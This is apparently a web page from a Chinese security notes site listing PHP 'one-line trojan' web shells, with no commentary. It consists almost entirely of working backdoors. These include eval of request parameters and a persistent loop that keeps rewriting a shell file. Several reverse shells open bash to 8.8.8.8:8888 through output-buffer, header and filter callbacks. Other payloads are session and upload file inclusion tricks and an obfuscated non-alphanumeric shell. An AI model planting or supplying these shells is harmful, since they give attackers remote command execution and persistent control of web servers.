一句话木马
php 一句话木马
<?php eval($_REQUEST[c]);?><?php
ignore_user_abort(true);
set_time_limit(0);
$file = 'c.php';
$code = '<?php eval($_POST[c]);?>';
while(true) {
if(!file_exists($file)) {
file_put_contents($file, $code);
}
usleep(50);
}
?><?php eval($_REQUEST[c]);?>\r <?php phpinfo();?><?php
function a($b){
exec('/bin/bash -c "bash -i >& /dev/tcp/8.8.8.8/8888 0>&1"');
}
ob_start("a");
?><?php
function a(){
exec('/bin/bash -c "bash -i >& /dev/tcp/8.8.8.8/8888 0>&1"');
}
header_register_callback('a');
?><?php
function a(){
$_GET[c]($_GET[d]);
}
header_register_callback('a');
?><?php
function a($value){
exec('/bin/bash -c "bash -i >& /dev/tcp/8.8.8.8/8888 0>&1"');
}
filter_input(INPUT_POST, 'c', FILTER_CALLBACK, array('options' => 'a'));
?><?php
function a($c){
$c($_GET['d']);
}
filter_input(INPUT_GET,'c', FILTER_CALLBACK,array('options'=>'a'));
?><?php
class A{
function __construct(){
phpinfo();
// $_GET[c]($_GET[d]);
}
}
stream_wrapper_register("st", "A");
$fp = fopen("st://","r");
?><?php
session_start();
extract($_GET);
var_dump($_SESSION);
if(preg_match('/[0-9]/',$_SESSION['PHPSESSID'])){exit;}
if(preg_match('/\/|\./',$_SESSION['PHPSESSID'])){exit;}
include(ini_get("session.save_path")."/sess_".$_SESSION['PHPSESSID']);
?><?php
if(md5($_POST['p'])==='d8d1a1efe0134e2530f503028a825253'){
@eval($_POST['c']);
}
?><?php
include($_FILES["file"]["tmp_name"]);
?><?php
$_=[].[];
$__='';
$_=$_[''];
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$__.=$_; // E
$_=++$_;
$_=++$_;
$__=$_.$__; // GE
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$__.=$_; // GET
${'_'.$__}[_](${'_'.$__}[__]); // $_GET[_]($_GET[__]);最后更新于